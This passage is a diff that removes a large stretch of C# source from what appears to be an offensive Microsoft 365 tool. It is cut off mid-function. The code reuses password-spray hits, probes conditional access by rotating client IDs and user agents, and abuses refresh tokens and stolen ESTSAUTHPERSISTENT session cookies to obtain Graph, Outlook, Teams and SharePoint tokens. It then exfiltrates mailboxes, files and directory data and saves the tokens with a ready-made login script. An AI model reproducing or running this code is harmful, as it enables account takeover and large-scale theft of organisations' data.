-                    Console.WriteLine($"    |-> ALL - Everyone!");
-                    Console.WriteLine();
-                    Console.Write("[?] What user to target ? #> ");
-                    var selection = Console.ReadLine();
-
-                    if (selection.ToLower().StartsWith("ALL".ToLower()))
-                    {
-                        foreach (SprayAttempt accObject in validLogins)
-                        {
-                            await PrepareExfil(accObject, exfilOptions);
-
-                        }
-                    }
-                    else if (selection.Contains("-"))
-                    {
-                        if (selection.Split("-").Length > 2)
-                        {
-                            int start = Convert.ToInt32(selection.Split("-")[0]);
-                            int end = Convert.ToInt32(selection.Split("-")[1]);
-                            foreach (var accObject in validLogins.GetRange(start, end - start))
-                            {
-                                await PrepareExfil(accObject, exfilOptions);
-
-                            }
-                        }
-                        else
-                        {
-                            Console.WriteLine("[+] Provided format must be <START INDEX>-<STOP INDEX>");
-                        }
-                    }
-                    else if (selection.Contains(","))
-                    {
-                        var intArray = selection.Split(",").Select(x => Convert.ToInt32(x));
-
-                        foreach (var intSelection in intArray)
-                        {
-                            await PrepareExfil(validLogins[intSelection], exfilOptions);
-                        }
-                    }
-                    else
-                    {
-                        var accObject = validLogins[Convert.ToInt32(selection)];
-
-                        await PrepareExfil(accObject, exfilOptions);
-                    }
-                }
-
-            }
-        }
-        private static async Task<List<EnumeratedConditionalAccess>> EnumFamilyRefreshTokens(BearerTokenResp validToken, MSOLHandler msolHandler)
-        {
-            var validResList = new List<EnumeratedConditionalAccess> { };
-
-            var proxyURL = _globalProperties.GetBaseUrl();
-
-            List<string> officeResourceList = Helpers.Generic.officeResources();
-
-            List<(string userAgent, string platform)> userAgentList = Helpers.Generic.userAgents();
-
-            //For each target resource (Data)
-
-            var clientIdList = new List<(string clientId, string clientName)>{
-                    ("1fec8e78-bce4-4aaf-ab1b-5451cc387264", "Microsoft Teams"),
-                    ("04b07795-8ddb-461a-bbee-02f9e1bf7b46", "Microsoft Azure CLI"),
-                    ("1950a258-227b-4e31-a9cf-717495945fc2", "Microsoft Azure PowerShell"),
-                    ("00b41c95-dab0-4487-9791-b9d2c32c80f2", "Office 365 Management"),
-                    ("26a7ee05-5602-4d76-a7ba-eae8b7b67941", "Windows Search"),
-                    ("27922004-5251-4030-b22d-91ecd9a37ea4", "Outlook Mobile"),
-                    ("4813382a-8fa7-425e-ab75-3b753aab3abb", "Microsoft Authenticator App"),
-                    ("ab9b8c07-8f02-4f72-87fa-80105867a763", "OneDrive SyncEngine"),
-                    ("d3590ed6-52b3-4102-aeff-aad2292ab01c", "Microsoft Office"),
-                    ("872cd9fa-d31f-45e0-9eab-6e460a02d1f1", "Visual Studio"),
-                    ("af124e86-4e96-495a-b70a-90f90ab96707", "OneDrive iOS App"),
-                    ("2d7f3606-b07d-41d1-b9d2-0d0c9296a6e8", "Microsoft Bing Search for Microsoft Edge"),
-                    ("844cca35-0656-46ce-b636-13f48b0eecbd", "Microsoft Stream Mobile Native"),
-                    ("87749df4-7ccf-48f8-aa87-704bad0e0e16", "Microsoft Teams - Device Admin Agent"),
-                    ("cf36b471-5b44-428c-9ce7-313bf84528de", "Microsoft Bing Search"),
-                    ("0ec893e0-5785-4de6-99da-4ed124e5296c", "Office UWP PWA"),
-                    ("22098786-6e16-43cc-a27d-191a01a1e3b5", "Microsoft To-Do client"),
-                    ("d3590ed6-52b3-4102-aeff-aad2292ab01c", "Outlook"),
-                    ("ab9b8c07-8f02-4f72-87fa-80105867a763", "OneNote")
-                };
-
-
-            //For each built in AAD Client ID (Application)
-            foreach (var clientId in clientIdList)
-            {
-                //If we already have a token for this resource, there is no need to request another one
-                //TODO: UNLESS we want to increase our permission for the resource??
-
-                //Let it be known that we have access!
-                //_databaseHandler.WriteLog(new Log("EXFIL", $" URI: { officeResourceList[i] } APP: {clientId.application} PLATFORM: {userAgent.platform} => CAN ACCESS", "[US]") { }, true);
-
-                (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) validResponse = (null, null);
-
-                //Turn that into a bearerToken
-                //  validResponse.bearerToken = JsonConvert.DeserializeObject<BearerTokenResp>(conditionalAccessAttempt?.ResponseData);
-
-                //Refresh into that clientID first?
-                var crossRefresh = await msolHandler.RefreshAttempt(
-                    validToken,
-                    _globalProperties.GetBaseUrl(),
-                    validToken.resource,
-                    clientId.clientId,
-                    false,
-                    true,
-                    //   userAgent: userAgent,
-                    scope: "openid"
-                    );
-
-
-                if (crossRefresh.bearerToken != null)
-                {
-                    //Do we now have a family refresh token?
-                    //Have we identifed a bypass / a token we can use to refresh into another resource?
-                    var newScopeRefresh = await msolHandler.RefreshAttempt(
-                        crossRefresh.bearerToken,
-                        _globalProperties.GetBaseUrl(),
-                         validToken.resource,
-                        clientId.clientId,
-                        false,
-                        true,
-                        //  userAgent: userAgent,
-                        scope: "https://api.spaces.skype.com/.default"
-                        );
-                }
-
-            }
-            return validResList;
-        }
-
-        private static async Task<List<EnumeratedConditionalAccess>> EnumerateConditionalAccess(string username, string password, MSOLHandler msolHandler, bool stopAtValid = false)
-        {
-            var validResList = new List<EnumeratedConditionalAccess> { };
-
-
-            #region userCreds
-
-            #endregion
-            var proxyURL = _globalProperties.GetBaseUrl();
-
-            List<string> officeResourceList = Helpers.Generic.officeResources();
-            List<(string clientId, string application)> clientIdList = Helpers.Generic.clientIds();
-            List<(string userAgent, string platform)> userAgentList = Helpers.Generic.userAgents();
-
-            //For each target resource (Data)
-
-
-
-            for (int i = 0; i < officeResourceList.Count; i++)
-            {
-                //For each built in AAD Client ID (Application)
-                foreach (var clientId in clientIdList)
-                {
-                    //For each useragent - Platform
-                    foreach (var userAgent in userAgentList)
-                    {
-
-                        //If we already have a token for this resource, there is no need to request another one
-                        //TODO: UNLESS we want to increase our permission for the resource??
-                        if (_databaseHandler.QueryToken(username, officeResourceList[i]).Count() > 0)
-                        {
-                            //Skip unless we are at last resource
-                            if (i < officeResourceList.Count() - 1)
-                            {
-                                i++;
-                                break;
-                            }
-                            else
-                            {
-                                //If we are at last resc, and already have access, just return list
-                                return validResList;
-                            }
-
-                        }
-
-                        //Attempt to login and get an access token
-                        var loginResp = await msolHandler.LoginAttemptFireProx(username, password, proxyURL, (officeResourceList[i], clientId.Item1), true, userAgent.userAgent);
-
-                        //Check if we have invalid creds, in that case abort!
-                        if (loginResp.bearerTokenError != null)
-                        {
-                            var respCode = loginResp.bearerTokenError.error_description.Split(":")[0].Trim();
-
-                            //Set a default response
-                            var errorCodeOut = (msg: $"UNKNOWN {respCode}", valid: false, disqualified: false, accessPolicy: false);
-
-                            //Try to parse
-                            Helpers.Generic.GetErrorCodes().TryGetValue(respCode, out errorCodeOut);
-
-                            if (!errorCodeOut.valid)
-                            {
-                                //Creds has changed, remove the user!
-                                Console.WriteLine($"[!] Credentials identfied earlier for {username} are no longer valid, marking as invalid account");
-                                var validAccount = _databaseHandler.QueryValidLogin(username);
-                                validAccount.Valid = false;
-                                _databaseHandler.UpdateAccount(validAccount);
-                                return new List<EnumeratedConditionalAccess> { };
-                            }
-                        }
-
-                        //We got an access token
-                        if (loginResp.bearerTokenError == null && loginResp.bearerToken != null)
-                        {
-                            //Note this down
-                            var conditionalAccessAttempt = new EnumeratedConditionalAccess()
-                            {
-                                ResourceClientId = clientId.clientId,
-                                ResourceUri = officeResourceList[i],
-                                Username = username,
-                                UserAgent = userAgent.userAgent,
-                                ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken)
-                            };
-
-                            //Let it be known that we have access!
-                            _databaseHandler.WriteLog(new Log("EXFIL", $" URI: {officeResourceList[i]} APP: {clientId.application} PLATFORM: {userAgent.platform} => CAN ACCESS", "[US]") { }, true);
-
-                            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) validResponse = (null, null);
-
-                            //Turn that into a bearerToken
-                            validResponse.bearerToken = JsonConvert.DeserializeObject<BearerTokenResp>(conditionalAccessAttempt?.ResponseData);
-
-                            validResList.Add(conditionalAccessAttempt);
-                            _databaseHandler.WriteEnumeratedConditionalAccess(conditionalAccessAttempt);
-
-                            if (stopAtValid)
-                                return validResList;
-
-
-
-                        }
-                        else
-                        {
-                            var respCode = loginResp.bearerTokenError.error_description.Split(":")[0].Trim();
-                            var message = loginResp.bearerTokenError.error_description.Split(":")[1].Trim();
-
-                            //Set a default response
-                            var errorCodeOut = (msg: $"UNKNOWN {respCode}", valid: false, disqualified: false, accessPolicy: false);
-
-                            //Try to parse
-                            Helpers.Generic.GetErrorCodes().TryGetValue(respCode, out errorCodeOut);
-
-                            _databaseHandler.WriteLog(new Log("EXFIL", $" URI: {officeResourceList[i]} APP: {clientId.application} PLATFORM: {userAgent.platform} => {errorCodeOut.msg}", "[US]") { }, true);
-
-                        }
-                    }
-
-                }
-            }
-            return validResList;
-        }
-
-        private static async Task PrepareExfilCreds(string username, string password, ExifilOptions exfilOptions)
-        {
-
-            //We need to check if these creds belong to an user we can actually exfiltrate infromation from, aka no adfs!
-            var getUserRealmResult = await Helpers.Generic.CheckUserRealm(username, _globalProperties);
-
-            if (getUserRealmResult.UsGovCloud)
-            {
-                _databaseHandler.WriteLog(new Log("SPRAY", $"US GOV Tenant detected - Updating spraying endpoint from .com => .us"));
-                _globalProperties.UsCloud = true;
-            }
-
-            if (getUserRealmResult.ThirdPartyAuth && !getUserRealmResult.Adfs)
-            {
-                _databaseHandler.WriteLog(new Log("SPRAY", $"Third party authentication detected - exfil will not work, sorry!\nThird-Party Authentication url: " + getUserRealmResult.ThirdPartyAuthUrl));
-                Environment.Exit(0);
-            }
-
-
-            //Check if this client has ADFS
-            if (getUserRealmResult.Adfs && !_globalProperties.AADSSO)
-            {
-                _databaseHandler.WriteLog(new Log("SPRAY", $"ADFS federation detected , exfil will not work"));
-                Environment.Exit(0);
-
-            }
-
-            var randomResource = Helpers.Generic.RandomO365Res();
-
-            var sprayAttempt = new SprayAttempt()
-            {
-                Username = username,
-                Password = password,
-                //ComboHash = "",
-                FireProxURL = _globalProperties.GetBaseUrl(),
-                FireProxRegion = "NONE", //fireProxObject.Item2.Region,
-                ResourceClientId = randomResource.clientId,
-                ResourceUri = randomResource.Uri,
-                AADSSO = false, //_globalProperties.AADSSO,
-                ADFS = false, //getUserRealmResult.Adfs
-            };
-
-
-            //Attempt to login once in order to confirm creds are infact valid, as well as parse the information into the database
-            var sprayedAttempt = await Spray.SprayAttemptWrap(sprayAttempt, _globalProperties, _databaseHandler, getUserRealmResult);
-
-            if (sprayedAttempt.Valid)
-                await PrepareExfil(sprayedAttempt, exfilOptions, true);
-
-
-            return;
-
-        }
-        private static async Task RefreshExfilAccountAsync(string outpath, BearerTokenResp inputTokenData, ExifilOptions exifilOptions, MSOLHandler msolHandler, string clientId = "1fec8e78-bce4-4aaf-ab1b-5451cc387264")
-        {
-            //Extract the username from the initial JWT token
-            string username = Helpers.Generic.GetUsername(inputTokenData.access_token);
-            //Create the output path based on this
-            var baseUserOutPath = Path.Combine(outpath, Helpers.Generic.MakeValidFileName(username));
-            Directory.CreateDirectory(baseUserOutPath);
-
-            //Declare a bunch of empty tokens objects
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) companySharePointToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) personalOneDriveToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) outlookToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) msGraphToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) adGraphToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) teamsToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) azurePSToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-
-            //If we want to exfil -aad
-            if (exifilOptions.AAD)
-            {
-
-                if (adGraphToken.bearerToken?.access_token == null)
-                    adGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.windows.net", clientId: clientId);
-
-                if (msGraphToken.bearerToken?.access_token == null)
-                    msGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.microsoft.com", clientId: clientId);
-
-                if (msGraphToken.bearerToken?.access_token != null)
-                    await MsGraphExfilAsync(msGraphToken.bearerToken, baseUserOutPath);
-
-                if (adGraphToken.bearerToken?.access_token != null)
-                    await AdGraphExfilAsync(adGraphToken.bearerToken, baseUserOutPath);
-
-
-            }
-
-            if (exifilOptions.OWA)
-            {
-                //Get the tokens neede if we don't already have them
-                if (outlookToken.bearerToken?.access_token == null)
-                    outlookToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://outlook.office365.com", clientId: clientId);
-
-                //Did we get them, if so let's exfil!
-                if (outlookToken.bearerToken?.access_token != null)
-                    await OWAExfilAsync(outlookToken.bearerToken, baseUserOutPath);
-
-            }
-
-            if (exifilOptions.Teams)
-            {
-                //In order to exfilrate Teams, we need to know the sharepoint personal and company site
-                //We can get this using either the Teams API
-
-                //Check if we have/can get an teams token
-                if (teamsToken.bearerToken?.access_token == null)
-                    teamsToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://api.spaces.skype.com", clientId: clientId);
-
-                //Do we have a teams token?
-                if (teamsToken.bearerToken != null)
-                {
-
-                    TeamsHandler teamsHandler = new TeamsHandler(teamsToken.bearerToken, _globalProperties);
-
-                    List<GetTenatsResp> tenantInfo = await teamsHandler.GetTenantsInfo();
-                    FilesAvailabilityResp sharePointInfo = await teamsHandler.GetSharePointInfo();
-
-
-                    File.WriteAllText(Path.Combine(baseUserOutPath, "Tenant.json"), JsonConvert.SerializeObject(tenantInfo, Formatting.Indented));
-                    File.WriteAllText(Path.Combine(baseUserOutPath, "SharePoint.json"), JsonConvert.SerializeObject(sharePointInfo, Formatting.Indented));
-
-                    if (sharePointInfo?.personalRootFolderUrl != null)
-                    {
-
-                        //Get the tokens neede if we don't already have them
-                        if (companySharePointToken.bearerToken?.access_token == null)
-                            companySharePointToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), sharePointInfo.personalRootFolderUrl.Replace("-my", ""), clientId: clientId);
-                        //Get the tokens neede if we don't already have them
-                        if (personalOneDriveToken.bearerToken?.access_token == null)
-                            personalOneDriveToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), sharePointInfo.personalRootFolderUrl, clientId: clientId);
-
-                        //Did we get them, if so let's exfil!
-                        if (teamsToken.bearerToken?.access_token != null && personalOneDriveToken.bearerToken?.access_token != null)
-                            await TeamsExfilAsync(teamsToken.bearerToken, personalOneDriveToken.bearerToken, companySharePointToken.bearerToken, baseUserOutPath);
-
-                    }
-
-
-
-                }
-            }
-
-            if (exifilOptions.Tokens)
-            {
-                if (msGraphToken.bearerToken?.access_token == null)
-                    msGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.microsoft.com", clientId: clientId);
-
-                //We need either a teams token or Graph API token in order to get the SharePoint URL
-                if (msGraphToken.bearerToken != null)
-                {
-                    var oneDriveHandler = new OneDriveHandler(msGraphToken.bearerToken, username, _globalProperties, _databaseHandler);
-
-                    //Pretty sure this can be done without Auth
-                    SharePointSite siteRoot = await oneDriveHandler.GetSiteRoot();
-
-                    if (siteRoot != null)
-                    {
-
-
-                        companySharePointToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), siteRoot.WebUrl.Replace("-my", ""), clientId: clientId);
-                        personalOneDriveToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), siteRoot.WebUrl, clientId: clientId);
-                    }
-                }
-
-
-                outlookToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://outlook.office365.com", clientId: clientId);
-
-                azurePSToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://management.core.windows.net/", clientId: clientId);
-
-                msGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.microsoft.com", clientId: clientId);
-
-                adGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.windows.net", clientId: clientId);
-
-
-                var bearerTokensOutPath = Path.Combine(baseUserOutPath, @"Tokens");
-                Directory.CreateDirectory(bearerTokensOutPath);
-
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "TeamsToken.txt"), JsonConvert.SerializeObject(inputTokenData, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "AdGraphToken.txt"), JsonConvert.SerializeObject(adGraphToken.bearerToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "MsGraphToken.txt"), JsonConvert.SerializeObject(msGraphToken.bearerToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "OutlookToken.txt"), JsonConvert.SerializeObject(outlookToken.bearerToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "OneDriveToken.txt"), JsonConvert.SerializeObject(personalOneDriveToken.bearerToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "SharePointToken.txt"), JsonConvert.SerializeObject(companySharePointToken.bearerToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "AzureCLIToken.txt"), JsonConvert.SerializeObject(azurePSToken.bearerToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "loginAAD.ps1"), $"$AadToken=\"{adGraphToken.bearerToken?.access_token}\"\n$MsgToken=\"{msGraphToken.bearerToken?.access_token}\"\nConnect-MsolService -AdGraphAccessToken $AadToken -MsGraphAccessToken $MsgToken -AzureEnvironment 'AzureCloud'");
-
-            }
-
-
-
-
-            if (exifilOptions.OneDrive)
-            {
-
-
-                if (msGraphToken.bearerToken?.access_token == null)
-                    msGraphToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), "https://graph.microsoft.com", clientId: clientId);
-
-                //We need either a teams token or Graph API token in order to get the SharePoint URL
-                if (msGraphToken.bearerToken != null)
-                {
-                    var oneDriveHandler = new OneDriveHandler(msGraphToken.bearerToken, username, _globalProperties, _databaseHandler);
-
-
-                    SharePointSite siteRoot = await oneDriveHandler.GetSiteRoot();
-
-                    //Get the tokens neede if we don't already have them
-                    if (companySharePointToken.bearerToken?.access_token == null)
-                        companySharePointToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), siteRoot.WebUrl.Replace("-my", ""), clientId: clientId);
-
-                    if (personalOneDriveToken.bearerToken?.access_token == null)
-                        personalOneDriveToken = await msolHandler.RefreshAttempt(inputTokenData, _globalProperties.GetBaseUrl(), siteRoot.WebUrl, clientId: clientId);
-
-
-                    //Did we get them, if so let's exfil!
-                    if (companySharePointToken.bearerToken != null && inputTokenData != null)
-                        await OneDriveExfilAsync(companySharePointToken.bearerToken, msGraphToken.bearerToken, inputTokenData, personalOneDriveToken.bearerToken, oneDriveHandler, baseUserOutPath);
-                }
-
-            }
-        }
-        private static async Task CookieExfilAccountAsync(string outpath, List<CookieObject> cookieObjects, ExifilOptions exifilOptions, MSOLHandler msolHandler)
-        {
-            //Check to confirm that we have the coookies we need
-            if (!cookieObjects.Select(cookie => cookie.name).Contains("ESTSAUTHPERSISTENT"))
-            {
-                Console.WriteLine("[+] Could not found required ESTSAUTHPERSISTENT cookie in dump, user might not be logged into Microsoft");
-            }
-
-            //Extract the information we need from the dump
-            var tokenDict = new List<(string username, PulledTokens pulledToken)>() { };
-            JwtSecurityTokenHandler jwsSecurityHandler = new JwtSecurityTokenHandler();
-
-            //Look for accessTokens inside cookie objects and add them to the database!
-            //TODO: Make sure we do not add tokens that are already in the database, and that the tokens we add are infact valid!
-
-            foreach (var possibleToken in cookieObjects)
-            {
-                var regeexData = Regex.Match(possibleToken.value, @"(ey[a-zA-Z0-9_=]+)\.([a-zA-Z0-9_=]+)\.([a-zA-Z0-9_\-\+\/=]*)");
-                if (regeexData.Success)
-                {
-                    string token = regeexData.Value;
-                    JwtSecurityToken jwtSecurityToken = jwsSecurityHandler.ReadJwtToken(token);
-
-                    if (Helpers.Generic.hasValidRecUri(jwtSecurityToken))
-                    {
-                        PulledTokens parsedTokenObject = Helpers.Generic.ParseSingleAccessToken(jwtSecurityToken);
-                        var tempTokenDictObject = (Helpers.Generic.GetUsername(jwtSecurityToken.RawData), parsedTokenObject);
-                        if (!tokenDict.Contains(tempTokenDictObject))
-                        {
-                            tokenDict.Add(tempTokenDictObject);
-
-                            //Add a check to avoid adding tokens like crazy
-                            _databaseHandler.WriteToken(parsedTokenObject);
-                        }
-
-                    }
-                }
-            }
-
-            //We need an tenantId!
-            string tenantId = "";
-            string userName = "";
-
-            //If this fails, we could attempt to get the tenantId some other way? Maybe a public enum method or so
-            if (tokenDict.Count() > 0)
-            {
-                var firstToken = ((BearerTokenResp)tokenDict.FirstOrDefault().pulledToken).access_token;
-                tenantId = Helpers.Generic.GetTenantId(firstToken);
-                userName = Helpers.Generic.GetUsername(firstToken);
-            }
-            else
-            {
-                Console.WriteLine("[!] Failed to parse JWT and get TenantId automatically, what is the targets email?");
-                Console.WriteLine("#>");
-                string targetEmail = Console.ReadLine();
-                try
-                {
-                    string domain = targetEmail.Trim().Split("@")[1];
-                    GetOpenIdConfigResp openIdConfig = await msolHandler.GetOpenIdConfig(domain);
-                    tenantId = openIdConfig.authorization_endpoint.Split("/")[3];
-                }
-                catch (Exception)
-                {
-                    Console.WriteLine("[!] Failed to retrive TenantID, cannot continue without");
-                    Environment.Exit(0);
-                }
-             
-                
-            }
-            string cookie = "ESTSAUTHPERSISTENT=" + cookieObjects.Where(x => x.name.Equals("ESTSAUTHPERSISTENT")).FirstOrDefault()?.value;
-            if (string.IsNullOrEmpty(cookie))
-            {
-                Console.WriteLine("[!] ESTSAUTHPERSISTENT cookie was empty!");
-                Environment.Exit(0);
-            }
-
-            //TODO: Create dummy user to be added into the validUsers database so we can pick these at an later stage
-            //Get the team's access token
-            BearerTokenResp teamsToken = new BearerTokenResp() { };
-            try
-            {
-                var attempSingleSignOn = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, targetResource: "https://api.spaces.skype.com", checkCache: true);
-                //Let's try to abuse single sign on
-                teamsToken = attempSingleSignOn.bearerToken;
-            }
-            catch (Exception ex)
-            {
-                //TODO: That failed, check if we have it cached
-            }
-            TeamsHandler teamsHandler = new TeamsHandler(teamsToken, _globalProperties);
-
-            List<GetTenatsResp> tenantInfo = await teamsHandler.GetTenantsInfo();
-            FilesAvailabilityResp sharePointInfo = await teamsHandler.GetSharePointInfo();
-
-
-            var baseUserOutPath = Path.Combine(outpath, Helpers.Generic.MakeValidFileName(userName));
-            Directory.CreateDirectory(baseUserOutPath);
-
-            File.WriteAllText(Path.Combine(baseUserOutPath, "Tenant.json"), JsonConvert.SerializeObject(tenantInfo, Formatting.Indented));
-            File.WriteAllText(Path.Combine(baseUserOutPath, "SharePoint.json"), JsonConvert.SerializeObject(sharePointInfo, Formatting.Indented));
-
-
-            string companySharePointUrl = "";
-            string personalSharePointUrl = "";
-
-            if (sharePointInfo?.personalRootFolderUrl == null)
-            {
-                _databaseHandler.WriteLog(new Log("EXFIL", $"User has not been configured / licensed for o365, skipping OneDrive/SharePoint", "") { }, true);
-
-                sharePointInfo = new FilesAvailabilityResp();
-                sharePointInfo.personalRootFolderUrl = "invalid";
-                exifilOptions.OneDrive = false;
-
-            }
-            else
-            {
-                companySharePointUrl = sharePointInfo.personalRootFolderUrl.Replace("-my", "");
-                personalSharePointUrl = sharePointInfo.personalRootFolderUrl;
-            }
-
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) companySharePointToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) personalOneDriveToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) outlookToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) msGraphToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-            (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) adGraphToken = (new BearerTokenResp() { }, new BearerTokenErrorResp() { });
-
-            var cookieBaseUrl = _globalProperties.GetBaseUrl().Replace("/common/oauth2/token", "");
-
-            if (exifilOptions.Tokens)
-            {
-
-                companySharePointToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, targetResource: companySharePointUrl);
-
-                personalOneDriveToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, targetResource: personalSharePointUrl);
-
-                outlookToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, targetResource: "https://outlook.office365.com");
-
-                msGraphToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, targetResource: "https://graph.microsoft.com");
-
-                adGraphToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, targetResource: "https://graph.windows.net");
-
-
-                var bearerTokensOutPath = Path.Combine(baseUserOutPath, @"Tokens");
-                Directory.CreateDirectory(bearerTokensOutPath);
-
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "TeamsToken.txt"), JsonConvert.SerializeObject(teamsToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "AdGraphToken.txt"), JsonConvert.SerializeObject(adGraphToken.bearerToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "MsGraphToken.txt"), JsonConvert.SerializeObject(msGraphToken.bearerToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "OutlookToken.txt"), JsonConvert.SerializeObject(outlookToken.bearerToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "OneDriveToken.txt"), JsonConvert.SerializeObject(personalOneDriveToken.bearerToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "SharePointToken.txt"), JsonConvert.SerializeObject(companySharePointToken.bearerToken, Formatting.Indented));
-                File.WriteAllText(Path.Combine(bearerTokensOutPath, "loginAAD.ps1"), $"$AadToken=\"{adGraphToken.bearerToken.access_token}\"\n$MsgToken=\"{msGraphToken.bearerToken.access_token}\"\nConnect-MsolService -AdGraphAccessToken $AadToken -MsGraphAccessToken $MsgToken -AzureEnvironment 'AzureCloud'");
-
-            }
-
-            if (exifilOptions.Teams)
-            {
-                //Get the tokens neede if we don't already have them
-                if (personalOneDriveToken.bearerToken?.access_token == null)
-                    personalOneDriveToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, personalSharePointUrl);
-
-
-                if (companySharePointToken.bearerToken?.access_token == null)
-                    companySharePointToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, companySharePointUrl);
-
-                //Did we get them, if so let's exfil!
-                if (teamsToken?.access_token != null && personalOneDriveToken.bearerToken?.access_token != null)
-                    await TeamsExfilAsync(teamsToken, personalOneDriveToken.bearerToken, companySharePointToken.bearerToken, baseUserOutPath);
-
-
-
-
-            }
-            if (exifilOptions.AAD)
-            {
-                //Get the tokens needed if we don't already have them
-                if (adGraphToken.bearerToken?.access_token == null)
-                    adGraphToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, "https://graph.windows.net");
-
-                if (msGraphToken.bearerToken?.access_token == null)
-                    msGraphToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, "https://graph.microsoft.com");
-
-
-                //Did we get them, if so let's exfil!
-                if (adGraphToken.bearerToken?.access_token != null)
-                    await AdGraphExfilAsync(adGraphToken.bearerToken, baseUserOutPath);
-
-                if (msGraphToken.bearerToken?.access_token != null)
-                    await MsGraphExfilAsync(msGraphToken.bearerToken, baseUserOutPath);
-            }
-
-            if (exifilOptions.OWA)
-            {
-                //Get the tokens neede if we don't already have them
-                if (outlookToken.bearerToken?.access_token == null)
-                    outlookToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, "https://outlook.office365.com");
-
-                //Did we get them, if so let's exfil!
-                if (outlookToken.bearerToken?.access_token != null)
-                    await OWAExfilAsync(outlookToken.bearerToken, baseUserOutPath);
-
-                // File.WriteAllText(Path.Combine(outlookOutPath, "Emails.json"), JsonConvert.SerializeObject(allEmails, Formatting.Indented));
-            }
-
-
-
-            if (exifilOptions.OneDrive)
-            {
-
-                //Get the tokens neede if we don't already have them
-                if (companySharePointToken.bearerToken?.access_token == null)
-                    companySharePointToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, companySharePointUrl);
-
-                if (personalOneDriveToken.bearerToken?.access_token == null)
-                    personalOneDriveToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, personalSharePointUrl);
-
-                if (msGraphToken.bearerToken?.access_token == null)
-                    msGraphToken = await msolHandler.CookieGetAccessToken(tenantId, userName, cookie, cookieBaseUrl, "https://graph.microsoft.com");
-
